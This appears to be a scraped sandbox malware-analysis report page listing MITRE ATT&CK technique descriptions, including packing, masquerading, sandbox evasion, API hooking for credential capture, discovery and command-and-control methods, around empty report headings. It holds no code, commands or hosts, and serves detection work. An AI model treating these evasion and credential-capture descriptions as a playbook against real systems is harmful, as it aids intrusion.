Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 1dyvctHqv1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre